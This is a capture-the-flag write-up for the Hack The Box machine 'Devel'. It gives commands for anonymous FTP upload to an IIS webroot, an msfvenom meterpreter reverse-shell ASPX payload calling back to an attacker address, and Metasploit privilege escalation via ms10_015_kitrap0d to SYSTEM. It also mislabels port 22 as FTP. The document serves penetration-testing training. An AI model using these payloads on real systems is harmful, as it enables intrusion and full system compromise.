Devel
HTB - 4. Devel
nmap -T4 -p- -A 10.10.10.5
shows 22 (FTP) with anonymous login (to webroot directory?), 80 (HTTP) with Microsoft IIS httpd 7.5Go to
10.10.10.5
which is a default web pagedirbuster
(dirb
andgobuster
popular as well) withhttp://10.10.10.5:80
, wordlist/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
, and change file-extension toasm, asmx, asp, aspx, txt
because server is IISFTP: upload file to server
ftp 10.10.10.5 anonymous anonymous ls pwd put dog.jpg ls
Go to
10.10.10.5/dog.jpg
and it executes.msfvenom
Create
reverse_tcp
payload:msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.24 LPORT=4444 -f aspx > ex.aspx
Open up port to listen on:
sudo msfconsole use exploit/multi/handler options set payload windows/meterpreter/reverse_tcp options set LHOST 10.10.14.24 run
Back to FTP
binary <-- swith to binary instead of ascii put ex.aspx
Go to
10.10.10.5/ex.aspx
and shell poppedHacked
sysinfo getuid
Result: We are
IIS APPPOOL\Web
not authority system.getsystem
failed.Check to see which privilege escalation exploits might work:
background search suggester use post/multi/recon/local_exploit_suggester options set SESSION 1 run
Run privilege escalation
use exploit/windows/local/ms10_015_kitrap0d options set SESSION 1 options run options set lhost 10.10.14.24 <-- make sure using the right interface set lport 4445 <-- Need to use different port since 4445 already in use options run
Result: Shell popped with authority system
Last updated
Was this helpful?